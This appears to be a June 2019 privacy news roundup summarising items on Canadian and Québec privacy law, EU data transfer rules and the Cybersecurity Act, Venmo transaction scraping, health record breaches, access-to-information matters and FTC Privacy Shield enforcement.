Elliott LLP in Ottawa says that the privacy commissioner’s findings in the initial investigation of the Equifax breach would have made Canada an outlier in terms of privacy law, particularly on the distinction between uses and disclosures of data when outsourcing, and the consent needed to transfer personal information. Now, if the consultation is cancelled without addressing the OPC’s findings, the business community might find the law “unworkable,” says Elder. He says that lawyers are confused on whether to advise their clients to stop working on submissions for the consultation. “There is a considerable amount of uncertainty in the commissioners verbal announcement that he was suspending the announced consultation. The part that wasn’t clear is, ‘What does suspending mean? Will it be revived, and if so when, and what does it cover?” says Elder. As recently as May 15, the OPC said it was extending deadlines for comments about the consultation until Friday, June 28, 2019 and that given the consultation period, the office did “not expect organizations to change their practices at this time.” The Office of the Privacy Commissioner still says on its website that it is planning to update its Guidelines for Processing Personal Data Across Borders based on the now-defunct consultation. Adam Kadarsh, the chair of Osler, Hoskin & Harcourt LLP’s national privacy and data management practice and co-lead of AccessPrivacy, says there was almost unanimous disagreement with the OPC’s legal position. “The issues raised by the consultation have significant broad-based policy implications with highly adverse practical implications for organizations all sectors,” he says. “[T]he discussion is best suited as part of the statutory reform discussions regarding the amendment to PIPEDA, which were just recently announced by the federal government with its announcement of the Digital Charter. The commencement of the trans-border data flow consultation, it was like a metaphorical bomb in the privacy arena,” says Kardarsh. [Canadian Lawyer Magazine]

CA – Québec Private Sector Privacy Act: When Does It Apply Outside of Québec?

The territorial application of Québec’s Act Respecting the Protection of Personal Information in the Private Sector [PDF] remains to be settled by legislation or jurisprudence. While Courts have identified the criteria used to ascertain the existence of an enterprise, they have yet to develop a clear approach to the application of the Act to foreign enterprises with activities in the province of Québec. The lengthy blog post discusses how Canada’s Personal Information Protection and Electronic Documents Act (PIPEDA) [see OPC here] and the EU General Data Protection Regulation (GDPR) GDPR may provide models that could be considered in Québec. However, until the territorial scope of the Act is clarified, organizations may find that the Act applies to their activities in unexpected ways, as has occurred in a number of cases which this blog post discusses where there have been minimal connections to Québec. While Québec Courts have delineated the scope of province’s Private Sector Privacy Act through the notion of “enterprise,” they have yet to delineate the scope of the Act’s territorial application. Determining the territorial application of Québec privacy legislation thus remains unsettled and unclear. In contrast, to determine the application of PIPEDA, practitioners benefit from jurisprudence that applies an established method to ascertain its territorial application, i.e. the “real and substantial connection” test. To do the same for EU privacy legislation, practitioners can consult legislative provisions and detailed guidance documents. [Mondaq]

Consumer

CA – Only 9% of Canadians Know Political Parties are Exempt from Privacy Laws

A survey commissioned by the Centre for Digital Rights found only 9% of Canadian citizens knew political parties are not covered under the country’s privacy laws. Of the 1,471 Canadian voters polled, 85% said they did not know about the exemption, and 7% said they were not sure. After they were told about the current setup, 65% said they strongly agreed political parties should be covered by the privacy laws other organizations follow in Canada, with another 23% who said they somewhat agree. In April the Federal Privacy Commissioner Daniel Therrien and Chief Electoral Officer Stéphane Perreault have urged parties to set a high bar with their policies and released suggestions as to what a strong policy should contain [see PR & “Guidance for federal political parties on protecting personal information“]. they said parties should obtain meaningful consent for the collection and use of personal information. It added that parties should not assume Canadians are consenting to have their information included in a party database simply because they may like a party’s post on social media. [The Globe and Mail | Get meaningful consent when collecting voter data, federal parties told  | Federal parties urged to bolster privacy protections beyond what the law requires ahead of 2019 election | New privacy guidelines issued for political parties in wake of blanket text messages | Canada’s political parties should respect citizen’s privacy rights, watchdog says | Can politicians send you unsolicited text messages? Here are the rules in Canada | The Globe and Mail]

UK – Survey Shows UK Distrust, Value in Protecting NHS Data

A YouGov survey revealed 70% of U.K. respondents don’t trust multinational tech giants with National Health Service patient data. In the pool of 2,081 responses, 13% said they could trust multinational big tech companies, while 76% can’t support the data being analyzed in different countries that carry varying data laws and protections. The survey also polled 102 members of Parliament, 58% of whom stated they would want their information handled by U.K.-based companies, while 80% want NHS data to be protected and valued by the government. “It is absolutely crucial patient data is always protected to the highest standards and the Government has introduced new legislation to support this,” a spokesperson for the Department of Health and Social Care said in a statement. [ITV]

WW – Internet Privacy: It’s a Matter of Mental Health

Stanford University professor of psychiatry and behavioral sciences, Dr (MD) Elias Aboujaoude argues. In a perspective article for the Journal of Medical Ethics that we need to think about internet privacy as a mental health issue [see “Protecting privacy to protect mental health: the new ethical imperative“]. “In the popular media there are hundreds of stories about cyberstalking or revenge porn,” he said, noting that some of his patients have suffered from anxiety, depression and post-traumatic stress disorder after their personal details were exposed online. Yet, he said, “I was struck by how little there has been in the medical literature about this issue.” He calls on the U.S. medical community to embrace, on mental well-being grounds, a privacy bill of rights like the European Union’s General Data Protection Regulation. “For years I have approached this issue as a human right and am now putting out this article as a call to action,” he said. “In the medical profession we should be advocating for this right. We have a history, since Hippocrates, of protecting privacy in the doctor-patient relationship. It’s time we insist on broader protections for patients and citizens.” Privacy is a fundamental psychological need: It allows us to recover from harm and develop an individual identity, Aboujaoude said. But on the internet, the entire world can know our most intimate secrets. Aboujaoude said that clinicians can help patients protect their privacy by educating them on how to guard their personal information online. “We do a lot of education with patients — about disease, about trauma, about strategies to restore mental well-being. Internet privacy can fall within that,” he said. He added that studies into the mental health effects of online privacy violations should be a public health priority. “Research into the function of privacy predates the internet,” he said. “New research, in this digital age, is necessary and timely.” [SCOPE blog (Stanford Medicine)]

E-Government

US – U.S. Now Requires Social Media Info for Visa Applications

USA now requires virtually all visa applicants to provide their social media account names for the previous five years. This was proposed in March 2018 and to some extent in 2015. The mandate only covers a list of selected services, although potential visitors and residents can volunteer info if they belong to social sites that aren’t mentioned in the form. Applicants also have to provide previous email addresses and phone numbers on top of non-communications info like their travel statuses and any family involvement in terrorism. Some diplomats and officials are exempt from the requirements. The US had previously only required these details for people who visited terrorist-controlled areas. The goal is the same, however. The measure will affect millions of visa seekers each year, although whether or not it will be effective isn’t clear. A State Department official told The Hill that applicants could face “serious immigration consequences” if they’re caught lying, but it’s not certain that they’ll be found out in a timely fashion — the policy is counting on applicants both telling the truth and having relatively easy-to-find accounts if they’re dishonest. And like it or not, this affects the privacy of social media users who might not want to divulge their online identities (particularly private accounts) to government staff. [engadget | ‘Invasion Of Privacy’: U.S. Will Ask For Social Media Handles During Visa Application]

Electronic Records

US – Study Uses Privacy to Help Grade Top Data Management Platforms

Forrester released the findings of “The Forrester Wave: Data Management Platforms, Q2 2019.” The report focused on the top seven data management platforms and graded them based on a set of 34 different categories. Salesforce and Adobe were identified by Forrester as the top DMPs, particularly due to their emphasis on privacy. “Salesforce and Adobe’s goal is to build a privacy-first consent management, with known customer identifiers to facilitate known customer advertising,” Forrester Research Senior Analyst and DMP Wave Co-Author Tina Moffett said. In a blog post, Moffett wrote vendors “are future-proofing their technologies to ensure they’re privacy-focused, with consent management features, despite the data already being pseudonymized.” [AdExchanger]

US – FTC Submits Comment on Proposed Information Blocking Rule

The Federal Trade Commission staff has submitted a comment [read 2 pg PDF comment] to the Department of Health & Human Services’ Office of the National Coordinator for Health Information Technology [ONC] regarding ONC’s proposed rule on “information blocking” [see here & here] The Commission vote approving the comment to the ONC was 3-0-2, with Commissioners Rohit Chopra and Rebecca Kelly Slaughter abstaining. Recognizing that Congress sought to foster greater interoperability between electronic health records systems and the productive flow of electronic health information under the recently enacted 21st Century Cures Act, the FTC staff comment suggests that ONC consider changes to ensure the final rule does not inadvertently distort competition or impede innovation, to the detriment of consumer welfare. The comment includes four suggestions for potential adjustments to the proposed rule, including ONC’s proposed exceptions for “reasonable and necessary activities that do not constitute information blocking for purposes [of the proposed prohibition].” The comment asks ONC to consider:

  • using other, more fully developed examples of permissible conduct in order to clarify genuine safe harbors for conduct that does not harm competition or consumer welfare;
  • adjusting the definition of Electronic Health Information so that it applies more narrowly to the information central to purposes of the authorizing statute, such as information needed for patient treatment and Health Information System interoperability;
  • clarifying when market pricing is not deemed information blocking, and providing additional leeway for market pricing and certain ordinary refusals (or failures) to deal under the “recovering costs reasonably incurred,” “responding to requests that are infeasible,” and the “licensing of interoperability elements on fair and reasonable terms” exceptions; and
  • narrowing the proposed definition of “developers of certified Health Information Technology” to focus on those activities or practices that involve certified Health Information Technology. [US Federal Trade Commission]

EU Developments

WW – Update on EU Standard Contractual Clauses for International Data Transfers

On June 12, 2019, Hunton Andrews Kurth and its Centre for Information Policy Leadership [CIPL] hosted a roundtable discussion in the firm’s Brussels office on the update of the EU Standard Contractual Clauses for international data transfers [SCC – see EC guidance here & here]. More than 30 privacy leaders joined together to discuss the challenges of the current SCCs and provide their insights on the updated versions. Hunton partner David Dumont led the discussion, while CIPL President Bojana Bellamy illuminated CIPL’s work in this area. The session also featured Cristina Monti [Twitter here], Policy Officer in the International Data Flows and Protection Unit of the EU Commission DG Justice and Consumers. The seminar attracted a range of privacy professionals who responded to a quick survey regarding their preferred data transfer mechanisms and their experiences with SCCs. Key takeaways from this survey include:

  • 77% of the participating companies rely on SCCs to legitimize data transfers outside of the European Economic Area, 14% of the participants transfer personal data based on the European Commission’s adequacy decisions (including the decision recognizing the EU-U.S. Privacy Shield framework as providing adequate protection), and only 9% have put in place Binding Corporate Rules;
  • 52% of the participating companies have more than 100 SCCs in place, 39% have 10-100 SCCs in place, while 9% have less than 10 SCCs in place;
  • Out of the three available sets of SCCs, the most frequently used set is the Controller-to-Processor SCCs , which 88% of the participating companies use. None of the participants use the 2001 Controller-to-Controller SCCs;
  • It generally takes either up to three months or up to six months to execute SCCs;
  • The participants’ biggest challenge in executing or maintaining SCCs was multiparty contractual scenarios and the qualification of the data importer as a data controller or data processor;
  • 68% of the participants identified a need to incorporate the requirements of Article 28 of the EU General Data Protection Regulation into the Controller-to-Processor SCCs; and
  • When asked about new sets of SCCs, 84% of the participants identified the need to put in place Processor-to-Subprocessor SCCs. The Seminar also highlighted the advantages of SCCs, such as
  • the absence of formalities vis-à-vis EU data protection authorities,
  • the possibility to transfer data to any non-EU country,
  • the application to both intra-group and external data flows, and
  • their effectiveness as a quick and readymade tool, especially appreciated by Small and Medium Enterprises.

Participants mainly identified SCC disadvantages as due to

  • the absence of flexibility as SCCs cannot be modified;
  • the administrative burden that SCCs entail;
  • the non-application to specific data transfer scenarios, such as data transfers between a Processor-to-(Sub)Processor; and
  • the uncertain outcome of the Schrems II case [read recent coverage here], which is pending before the Court of Justice of the European Union. In that context, participants also discussed possible solutions to remedy these disadvantages.

Sources: Privacy & Information Security Law Blog (Hunton Andrews Kurth) | | European court to rule on validity of GDPR Standard Contractual Clauses | Facebook fails to stop Europe’s top court weighing in on EU-US data transfers | Facebook loses Supreme Court appeal in Max Schrems case]

EU – EDPB Adopts Final Draft Guidelines in Plenary Session

The European Data Protection Board announced a trio of guidelines that were adopted during its 11th plenary session Tuesday. Guidelines on Codes of Conduct, Accreditation and Certification were finalized by the board in an effort to strengthen and clarify parts of the EU General Data Protection Regulation. The Guidelines on Codes of Conduct sets out to help organizations interpret and apply Articles 40 and 41 of the GDPR. An annex to Guidelines for Accreditation will aid the implementation of Article 43’s provisions, while a second annex to Guidelines on Certification will pinpoint overreaching criteria within certification mechanisms in Articles 42 and 43. [FDPB]

EU – EDPS Inspection Reveals Data Protection Threats on EU Institutions’ Websites

The office of the European Data Protection Supervisor announced a recent analysis of EU institutions’ websites revealed seven out of ten websites had data protection issues. The EDPS inspection reviewed the data protection compliance of various public web services under EU Regulation 2018/1725, the ePrivacy Directive and EDPS guidelines on web services. Nonconsensual third-party tracking and the use of web trackers without visitor consent were among the issues found during the inspection. EDPS Giovanni Buttarelli said most inspected institutions have rectified their compliance issues. “The responses to this remote inspection have been reassuring,” Buttarelli said. “The EU institutions responsible for the most important websites have informed us of technical measures that they have implemented to significantly reduce the risks to security and privacy that were detected in our inspection.” [EDPS]

EU – Cybersecurity Act Gets The Green Light!

On 7 June 2019, Regulation (EU) 2019/881 on the European Union Agency for Network and Information Security [ENISA] and on information and communications technology cybersecurity certification also known as the Cybersecurity Act, was given the final go-ahead and published in the Official Journal of the European Union. The Cybersecurity Act will come into force on 27 June 2019. Cyberattacks are becoming more and more sophisticated and most often occur across borders. There is a growing need for effective and coordinated responses and crisis management at the EU level. The Cybersecurity Act aims to build a safer cyber environment through an EU-wide framework for businesses to achieve cybersecurity certification for their information and communications technology (ICT) products, processes and services. ENISA will assume the key role of supervising and advancing cooperation and information sharing across EU member states, EU institutions and international organisations. The past two years have seen cybersecurity turning into a high priority on the Brussels agenda. The Cybersecurity Act forms part of a set of measures across the board intended to promote more robust cybersecurity within the EU by establishing the first EU-wide cybersecurity certification framework across a broad range of products (e.g. the Internet of Things) and services. The Cybersecurity Act works alongside both: a) the EU General Data Protection Regulation, which requires security measures to be implemented when processing personal data; and b) the EU Network and Information Security Directive [NIS Directive], which aims to protect critical national infrastructure. While the NIS Directive applies only to operators of essential services and digital service providers, the Cybersecurity Act encourages all businesses to invest more in cybersecurity and to build it into their ICT devices. Ultimately, the collective framework of legislation is designed to counteract cyberattacks and to raise consumers’ and industry players’ trust in ICT solutions. [Technology Law Dispatch (Reed Smith)]

EU – Council of the EU Adopts Conclusions on Data Use to Combat Crime

The Council of the European Union announced it has concluded that the Working Party on Information Exchange and Data Protection can continue its data retention for the purpose of fighting crime. The council added in its conclusions that the European Commission will have the right to continue exploring the retention practices and make recommendations on its effectiveness. “The Council noted that data retention is an essential tool for investigating serious crime efficiently, but one whose use should be guided by the need to protect fundamental rights and freedoms,” the council said in its release. [Consilium]

Finance

WW – Millions of Venmo Transactions Scraped In Warning Over Privacy Settings

Graduate student in InfoSec, Dan Salmon, has scraped seven million Venmo transactions [Venmo is a peer-to-peer mobile payments service – see here] to prove that users’ public activity can still be easily obtained a year after Hang Do Thi Duc, a former Mozilla fellow, downloaded 207 million transactions in a similar feat [read coverage here]. Salmon said he scraped the transactions during a cumulative six months to raise awareness and warn users to set their Venmo payments to private. Both scraping efforts [were] possible because Venmo payments between users are public by default. Salmon published the scraped data on his GitHub page [see here] showing little has changed and that it’s still easy to download millions of transactions through the company’s developer API without obtaining user permission or needing the app. Using that data, anyone can look at an entire user’s public transaction history, who they shared money with, when, and in some cases for what reason — including illicit goods and substances. Indeed, last years disclosure inspired several new projects — including a bot that tweeted out every time someone bought drugs [read Motherboard coverage] Venmo has done little to curb the privacy issue for its 40 million users. Instead, Venmo has focused its effort on making the data more difficult to scrape rather than the underlying privacy issues. Last year, PayPal — which owns Venmo — settled with the FTC over privacy and security violations [read FTC PR here]. The company was criticized for misleading users over its privacy settings. The FTC said users weren’t properly informed that some transactions would be shared publicly, and that Venmo misrepresented the app’s security by saying it was “bank-grade,” which the FTC disputed. [TechCrunch | Most US mobile banking apps have security and privacy flaws, researchers say]

US – Most Mobile Banking Apps Have Security and Privacy Flaws: Researchers

New findings from security firm Zimperium say most of the top banking apps have security flaws that put user data at risk. Zimperium downloaded the iOS and Android apps of the top 45 US banks and mobile payment providers and scanned for security and privacy issues, like data leaks, which put private user data and communications at risk [access report here]. Most of the apps had issues, like failing to adhere to best coding practices and using old open-source libraries that are infrequently updated. Some of the apps were using open-source code from GitHub from more than three years ago. Worse, more than half of the banking apps are sharing customer data with at least one advertiser. The researchers, who didn’t name the banks, said one of the worst offending iOS apps scored 86 out of 100 on the risk scale for several privacy lapses, including communicating over an unencrypted HTTP connection. The same app was vulnerable to two known remote bugs dating back to 2015. The researchers said the risk scores for the banks’ corresponding Android apps were far higher. Two of the apps were rated with a risk score of 82 out of 100. Both of the apps were storing data in an insecure way, which third-party apps could access and recover sensitive data on a rooted device. One of the Android apps wasn’t properly validating HTTPS certificates, making it possible for an attacker to perform a man-in-the-middle attack. Several of the iOS and Android apps were capable of taking screenshots of the app’s display, increasing the risk of data leaking. Two-thirds of the Android banking apps are targeted by several malware campaigns, such as BankBot, which tricks users into downloading fake apps from Google Play and waits until the victim signs in to a banking app on their phone. Using an overlay screen, the malware campaigns steal logins and passwords. [TechCrunch]

FOI

CA — NWT to Have Most Progressive Access to Information Law in Canada

The Northwest Territories will soon have the most progressive access to information law in the country which will subject all Municipalities to access to information provisions. On May 30 MLAs unanimously gave final approval to the first major overhaul of the territory’s Access to Information and Protection of Privacy Act since it became law 23 years ago. The newly-revised act gives Information and Privacy Commissioner Elaine Keenan-Bengts the authority to order the release of information, rather than only making recommendations. Under the new law, Keenan-Bengts decisions stand unless the government goes to court and convinces a judge to overturn them. “I will no longer be making recommendations, I will be making orders, which can be filed with the court and enforced as a court order. “Over the years, the respect given to the recommendations made by my office has gone downhill. I’ve heard it said that there is in many parts of the government the feeling that, ‘There’s nothing she can really do except make recommendations, so don’t worry about it.’ They won’t be able to do that anymore” said Keenan-Bengts. The act still includes a long list of exceptions for government information, but now they will all be trumped by the public interest. Regardless of the exemptions, the heads of government departments and other senior officials will be required to release information when it is clearly in the public interest to do so. [CBC News]

CA – Secret Cold War File on Pierre Trudeau destroyed by CSIS

The Canadian Security Intelligence Service [CSIS] says a secret Cols War file on former prime minister Pierre Trudeau was scrapped in 1989 instead of turning it over to the national archives because it fell short of the legal threshold for retention by either the service or the archives. The Trudeau file was among hundreds of thousands CSIS inherited in the 1980s after the RCMP Security Service was dissolved following a series of scandals. In a bid to uncover subversives out to disrupt the established order, RCMP spies eyed a staggering variety of groups and individuals, from academics and unions to environmentalists, peace groups and even politicians. Security records on individuals become eligible for disclosure under the Access to Information Act only 20 years after a person’s death. Until then, even the existence of a file is secret due to privacy considerations. Next year makes the 20th anniversary of Trudeau’s death, so The Canadian Press recently requested the former prime minister’s RCMP file under the access law from Library and Archives Canada and CSIS given that it can take many months to process such applications. The archives swiftly replied that it does not have a Trudeau dossier. CSIS said its records indicate the file was destroyed on Jan. 30, 1989. Claiming a 1988 analysis of the Trudeau file concluded it did not meet the threshold in the CSIS Act to justify being kept in service’s active inventory. The file also fell short of criteria for preservation set out by the national archives and was therefore destroyed the following year, CSIS added. In stark contrast, The U.S. FBI which worked closely with the Mounties kept watch on Trudeau for more than 30 years, charting his path from globetrotting public intellectual who visited the Soviet Union in the early 1950s through his time as a Liberal prime minister. The bureau’s heavily censored, 151-page dossier was released under the U.S. Freedom of Information Act just months after Trudeau’s death in September 2000, in keeping with American disclosure practices. News of the decision to purge the file has stunned and disappointed historians. “It’s just outrageous, there’s no other word to describe it,” said John English, who wrote an acclaimed biography of Trudeau. “It’s a tragedy that this has happened, and I think the explanation is weak.” Steve Hewitt a senior lecturer at the University of Birmingham who has spent years chronicling the country’s security services, called the destruction “a crime against Canadian history. This wanton destruction cries out for parliamentary intervention to ensure that historically significant documents held by government agencies are preserved instead of being made to disappear down an Orwellian memory hole.” It is the sort of practice “expected of an authoritarian state and not a proper democracy that values its history,” said Hewitt, co-author of the recent Just Watch Us, which delves into RCMP surveillance of the women’s movement.’ [Global News]

Health / Medical

CA – NB Privacy at Risk When Their Medicare Cards Renewed: AG

The private information of “virtually every” New Brunswicker is at risk through the outsourcing and automatic renewal of medicare cards, says Kim MacPherson the province’s auditor general in her 2019 Auditor General’s Report [read Vol 1 & PR] released at the legislature. She found there have been 157 privacy breaches since 2017, including 31 so far this year, Kim MacPherson’s audit found. The majority relate to mailing addresses not being verified before medicare cards are mailed out, she said. Two private contracted companies — Medavie Blue Cross and CPI Card Group — possess sensitive personal data on New Brunswickers, including credit card information, noted MacPherson: “It is very important that Medicare safeguard that information and ensure it is only used for its intended purposes. Failure to do so subjects NB residents to the potential of identity theft, and the Province to financial and reputational risks” she wrote. [CBC News]

CA – Privacy Breach Spurs Surveillance of Employee’s Access to Health Charts

P.E.I.’s privacy watchdog wants Health PEI to keep closer tabs on one of its employee’s use of patient health records, following a privacy breach last year at Queen Elizabeth Hospital. That’s according to a new report by Information and Privacy Commissioner Karen Rose, posted May 30 [Breach Report HI-19-002] in March 2018, a patient received a copy of their electronic patient chart from Health PEI. That chart included a log showing who had accessed the patient’s health information, and when. The patient alerted Health PEI to concerns over one employee at QEH, who was personally known to the patient, who, according to the log, had accessed the patient’s medical records several times. According to the report, when asked about the allegation, the employee told Health PEI that all of their access to the patient’s health information was for “professional reasons.” Also, according to the report, the employee indicated “a long history of a volatile relationship” between the employee and patient. The report goes on to say the employee was concerned the privacy complaint was made by the patient “with malicious intent.” Health PEI investigated and found that the employee’s job duties required access to patients’ medical records, including the patient in question. However the agency’s investigation concluded the employee had accessed, without authorization, the patient’s records on some occasions. Health PEI found the employee was unable to offer a reasonable explanation for why the records had been accessed on those occasions. The employee was disciplined, but not fired. According to the commissioner’s report, the health agency followed correct procedures in alerting the patient as well as the privacy commissioner, and in containing and investigating the breach. For remediation Health PEI said it would provide privacy refresher training and would introduce random auditing of staff access to patient electronic charts — in the employee’s area. But the privacy commissioner recommended Health PEI go further with its monitoring of the employee in question. She recommended Health PEI introduce regular auditing of the employee’s access to patient records, with particular attention to the personal health information of the patient whose privacy was breached. Health PEI confirms it will take this action. [CBC News | 1,041 P.E.I. dental patients identified in privacy breach]

CA – Almost 3,000 Nova Scotians May Be Victims of Medical Records Privacy Breach, Says NSHA

Medical records of 2,841 people could be compromised after a Nova Scotia Health Authority employee recently fell victim to an email scam, the health authority said [read NSHA PR]. The employee clicked on a link in the email enabling the attacker to access the contents of the employee’s inbox, which contained the thousands of medical records. However it’s not known whether the attacker accessed those files. “So we are alerting that there was a potential breach,” said spokeswoman Carla Adams. The NSHA is sending out notifications to all the suspected victims and next of kin. Adams said the Office of the Information and Privacy Commissioner of Nova Scotia had been notified of the breach. IPC Catherine Tully, released her annual report last week [read 3 PDF], showing there were at least 865 privacy breaches of medical records between April 1, 2018 and March 31. Matt Saunders, a Halifax lawyer specializing in cybersecurity and privacy law, said people have a legitimate reason to question the province’s data protection systems and whether provincial government staff are being adequately trained to spot and prevent what have become repeated breaches of people’s medical records. Progressive Conservative opposition health critic Karla MacFarlane said the latest breach is cause for concern as the Liberal government prepares to move to a One Person One Record system. MacFarlane also pointed to Auditor General Michael Pickup’s 2018 performance audit in which he cited significant risks with the province’s information technology management. MacFarlane questioned whether the province can be trusted to modernize Nova Scotia’s health information systems. [The Chronicle Herald (Halifax) | Possible privacy breach at Nova Scotia Health Authority affects nearly 3,000 people | NSHA suffers privacy breach, nearly 3,000 patients possibly affected]

Horror Stories

US – Court Awards $68M over Improper Access to Personal Records

A Pennsylvania district court awarded $1,000 to 68,000 members of a class suit that claimed Bucks County and other municipal institutions violated state laws by making their criminal records public. The case began in 2012 when Daryoush Taha alleged that the county’s publicly accessible inmate search tool included access to an online database with criminal history records for all current and former Bucks County Correctional Facility inmates dating back to 1938. Access to the records is unlawful under the state’s Criminal History Records Information Act. Plaintiffs argued the failure to review and abide by the law came with “reckless indifference,” and a jury found there was a “willful” violation of the law. [Workplace Privacy, Data Management & Security Report blog]

Law Enforcement

CA – Mountie Broke Law When He Leaked Protester’s Background: Watchdog

In 2015 A British Columbia Mountie broke the law when he started snooping into a protester’s background and leaked information to city officials — but it took an outside investigation to convince RCMP brass to see it that way. The Civilian Review and Complaints Commission [CRCC] report obtained through access to information law is heavily redacted; it doesn’t even disclose the name of the municipality. However, it describes how the RCMP got involved after the person who filed the complaint with the CRCC — a boisterous protester — held up a sign at a municipal meeting that read “Pinko Commie.” The report says the municipality was concerned about the protester escalating his efforts. According to emails obtained by the commission, RCMP Insp. Al O’Donnell used PRIME — an electronic record management system used by police in British Columbia [see BCCLA on PRIME] — and other databases to find out if the protester had any past run-ins with police. The protester’s record was clean, according to the report. The RCMP relayed that news to the municipality. The RCMP investigated the protester’s original complaint and found its members acted “reasonably,” according to a report from the force’s independent watchdog. They defended the background search, saying it was conducted in the public’s interest. The CRCC disagreed saying: “The commission found that Inspector O’Donnell did unreasonably disclose redacted personal information contrary to law and policy. Superintendent Mark Fisher unreasonably authorized the disclosure.” The Privacy Act prohibits the disclosure of personal information by government institutions, except in limited circumstances. The RCMP says all detachment members were informed of the restrictions on the disclosure of personal information under RCMP E Division policy and the Privacy Act. The commission’s other recommendation was completely redacted. [CBC News]

Location

US – He Won a Landmark Case for Privacy Rights. He’s Going to Prison Anyway

Timothy Carpenter won’t be remembered for the circumstances that landed him in prison, but for the Supreme Court case that bears his name [read SCOTUS decision]. Carpenter v. United States, which set a new benchmark for privacy in the digital age, requires the police to obtain a warrant before obtaining cellphone location history from a phone company. Privacy advocates hailed the ruling, and saw in it the potential for broader protections for personal data in the digital age. Yet one curiosity of the case, as with similar Fourth Amendment rulings that limit the government’s reach into our private lives, is that it won’t be of any help to Mr. Carpenter. This week, a federal appeals court decided that Mr. Carpenter’s big victory at the Supreme Court won’t spare him from going to prison for the rest of his life [read June 11 6th Circuit ruling]. Under what’s called the exclusionary rule, any evidence obtained in violation of the Constitution cannot be used at trial. In Mr. Carpenter’s case, that meant about 129 days’ worth of cellphone tracking data. That should have meant a decisive victory for Mr. Carpenter. Not so, said the United States Court of Appeals for the Sixth Circuit, which took the Supreme Court’s pronouncement and more or less said that it didn’t matter. The appeals court acknowledged that the government “violated the Fourth Amendment” when F.B.I. agents sought and obtained, without a warrant, Mr. Carpenter’s location data. But under the good-faith exception to violations of the Fourth Amendment, the court said the agents acted reasonably and in “good faith” — and so whatever they gathered could still be used at trial. The F.B.I. merely followed the law and the rules that applied at the time of the violation. According to the A.C.L.U.’s Nathan Wessler, who argued and won the Carpenter case before the Supreme Court: “When courts dodge the Fourth Amendment question and rule just on good faith, it leaves the public and police without clear guidance about what the Fourth Amendment means and how it should apply to novel but important digital-age intrusions” [The New York Times]

Online Privacy

US – Consumer Reports Introduces New Data Privacy Initiative

Consumer Reports is rolling out Digital Lab, a new investigative entity that examines and rates the data privacy features of web-based products and services. Digital Lab’s analysis will focus on areas of privacy, transparency, security and data collection methods. “You can’t overlook the incredible change in the marketplace and in products and services that consumers are really trying to navigate,” Consumer Reports President and CEO Marta Tellado said. “And I think now more than ever, they’re looking for a trusted and independent partner that can provide a road map.” The new venture has the backing of Craigslist Founder Craig Newmark, who pledged $6 million to the cause and will serve as an honorary chair to an advisory council that will help Digital Lab grow. [Fast Company]

US – Removing Data from ‘People Search Engines’ Can Be a Challenge

Individuals face problems when they attempt to have their information removed from “people search engines”. People search engines collect names, addresses, details of lawsuits and photos. The data is collected from public records, social media profiles, paid-for databases and, more recently, genealogy sites, such as Ancestry.com. Some listed on the search engines have tried to remove the data from the sites; however, they are either asked to pay a fee or must wait months before their request is honored. Organizations that have monitored the broker sites find the information often reappears within months. [Financial Times]

US – Developers Removed from Apple’s App Store Propose API to Address Privacy Concerns

A group of companies claims they have addressed the privacy concerns that caused Apple to drop them from its App Store. The tech company removed several apps that created services designed to limit the amount of time users and their children spend on their iPhones. Following the decision, 17 companies that were impacted by the removal proposed an application programming interface they claim can track screen time without impacting user privacy. While the developers released the proposal, Apple would have to create the API itself. Meanwhile, The Wall Street Journal tested various iPhone apps to see which ones used third-party trackers. [The New York Times]

US – CEOs Reflect on Apple’s New Privacy-Safe Social Login Option

CEOs have reacted to Apple’s new privacy-focused logon button for apps. When Apple announced they were launching a privacy safe logon with iOS 13 as a way for users to sign in without being tracked, several advertisers took notice. With the forthcoming iOS 13, users will not have to sign in with the same email address; rather, Apple will generate a different email for every app or service that person uses as a way to prevent third parties from connecting a real email address to cross-app activity. For example, mParticle CEO Michael Katz said, “This is part of a continued overall trend where brands will need to prioritize the customer experience over a growth-at-all-costs approach.” [AdExchanger]

US – Breaking Down How ‘Dark Patterns’ Affect Online Users

The Wall Street Journal reports on tech companies’ use of “dark patterns” to prompt users to agree to actions that benefit the organization rather than the individual. Websites may use bright colors, big buttons and misleading deals to get users to share more information than they originally intended to or to agree to subscriptions. Social media companies may also set up privacy options to the least private settings by default, which forces users to manually change their settings within the platform. A proposed bill from Sens. Mark Warner, D-Va., and Deb Fischer, R-Neb., aims to ban the practice. [WSJ.com]

Privacy (US)

US – FTC Takes Action against Companies Falsely Claiming Compliance with the EU-U.S. Privacy Shield, Other International Privacy Agreements

The Federal Trade Commission reached a settlement with SecurTest, Inc., a background screening company, over allegations it falsely claimed to be a participant in the EU-U.S. Privacy Shield program [read decision & order also more docs]. The Commission vote to issue the administrative complaint and to accept the proposed consent agreement with SecurTest was 5-0. In its complaint [read 3 pg PDF], the FTC alleges that SecurTest, Inc., falsely claimed on its website that it participated in the EU-U.S. Privacy Shield [see here, 36 pg PDF framework doc here] and Swiss-U.S. Privacy Shield framework [see here, 69 pg PDF framework doc here & FAQ here], which establish processes to allow companies to transfer consumer data from European Union countries and Switzerland to the United States in compliance with EU and Swiss law, respectively. … While the company initiated a Privacy Shield application in September 2017 with the U.S. Department of Commerce, SecurTest did not complete the steps necessary to be certified as complying with the frameworks. By failing to complete certification, SecurTest was not a certified participant in the frameworks, despite representations to the contrary on its website. The Department of Commerce administers both frameworks, while the FTC enforces the promises companies make when joining those programs. The FTC also sent warning letters to 13 companies that falsely claimed they participate in the U.S.-EU Safe Harbor and the U.S.-Swiss Safe Harbor frameworks. These Safe Harbor agreements are no longer in force, and the last valid self-certifications for either agreement have expired. The FTC demanded they remove from their websites, privacy policies, or any other public documents any statements claiming they participate in either Safe Harbor agreement. If the companies fail to take action within 30 days, the FTC warned it would take appropriate legal action. The FTC also sent warning letters to two companies for claiming in their privacy policies that they are participants in the Asia-Pacific Economic Cooperation [APEC] Cross-Border Privacy Rules [CBPR] system even though they are not certified participants. It instructed the companies to remove from their websites, privacy policies, or any other public documents or statements that might be construed as claiming participation or involvement in the APEC CBPR system unless they prove that they have undergone the requisite review and certification. The FTC warned it would take appropriate legal action if the companies fail to provide a timely and satisfactory response. [News and Events (US FTC)]

US – FTC Releases Agenda for PrivacyCon 2019

